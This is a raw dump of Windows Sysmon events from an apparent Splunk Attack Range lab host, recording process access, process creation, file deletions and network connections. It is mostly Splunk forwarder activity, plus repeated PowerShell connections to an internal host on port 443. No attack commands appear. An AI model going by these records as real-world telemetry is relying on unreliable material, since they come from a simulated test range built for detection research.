Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.921{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:24.252{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.237{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.467{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63BAAD576212EF1B67F6C699B83C66A2,SHA256=D1ECB69DE231408B9A26282A05A523048A97D81986DFAD696835DB6D17F830ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.467{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A02034E5C3DA78A8B1145384E72CD0C,SHA256=A262965FDB8467AE96129E6E59C1555BBF5FA1CDC27423647E3C6A3590AD2C06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.089{B81B27B7-9F7C-6140-5556-04000000C801}46642776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.005{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF20A7470B138AFBC3807039DB80F34,SHA256=D37011927AA27F45F3F49354F5BEBFB787DC76261252B161986E2419DE75AF32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53B566D5924140D9B2EE95A264E1514A,SHA256=CADEB662D83A66099DCF80E11671DC5645863DF1F75EF5F5DCF81E378CF7FBCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.021{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C7914461E0C408FF85DA02688E38FD,SHA256=78D0C3E40B10FFA92DA58A118423EF81B9C61B35E8D589DD9836CBBDC722E1D4,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036496313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:27.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9247BB81F45E8E5C0F9669A3E500B332,SHA256=13EA9300F05734BF426A2235D5AF721BED3A11173733C3EA0C9CFD1DC66117F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.863{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50394-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.784{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50393-false10.0.1.12-8000- 23542300x800000000000000036496314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:28.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BEE4B54CCCFF89F2764472045C950E,SHA256=3DD15922C9E191F05971C4F5BA5F6233099F04A231A849A21A0E63A12936D490,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:29.066{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C2D4A628A9D8AC9A967AC03AF961DC,SHA256=CBC60F7D13EF742376A798F76D2B1328535F9549D7A253070D9295259309C0F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=260C1EDA1F9985F2E83B122408B6EB13,SHA256=F3E339215CAD9BE2643742E6E78E0640B5904DE325065B43C0EE0F0549CB5C92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128FE290CF64BD4666DF3AD62B63BF16,SHA256=957D6EC85D4B461138F4F2348A4DDF0005CECECDDE49A45B1D4AFA2408F32B6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50395-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 
23542300x800000000000000036496318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:31.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=405D745660CEA799F2BA39E300D37B04,SHA256=C01BD2E091B0B76C953D2BDD6CDEE49650C8D4F9039CF99FFC28A700F79B29E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.401{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F448CCE48D3AC07FD40ABE58E876349C,SHA256=1A0DEFBB552CE2910DF06E6E0161150B3DBDB5956B4EA93C02F197432236948E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:02.812{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50396-false10.0.1.12-8000- 
23542300x800000000000000036496322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:33.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097E3276470EA7FBFC286D77F97532BC,SHA256=C535CA539B735C5BB682B89868D60A8F525DBFE92B28798753477352F0F8D28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:04.058{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50397-false10.0.1.12-8089- 23542300x800000000000000036496324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:34.147{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CAAECF622DCD8E75B154AC3FE06DE7E,SHA256=66FB0DBD7462A4F891F1963ECF2AA609838BCF9165225130B4B6B98D645C9827,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=513F5697C242CD676E1D47E0A5645F71,SHA256=60B1C4354FD93EE6A6E3D4A975C31082A2EB2BF7FF07EB2B5161BA0E6D7CAFB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F595AF1F5C5F447D50E4598F5F1C8D99,SHA256=E52617E69021C380C59F6B67788B1111C662506E15B8FCC24146605FC14DE7F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:05.895{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50398-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:36.178{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718F8440EBAAA6FEF894C189929502B0,SHA256=9C3EDBA39DA8C7BBC93DA230B5F64507C3BF410C14BC59A731E21BCBFFAA9B9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
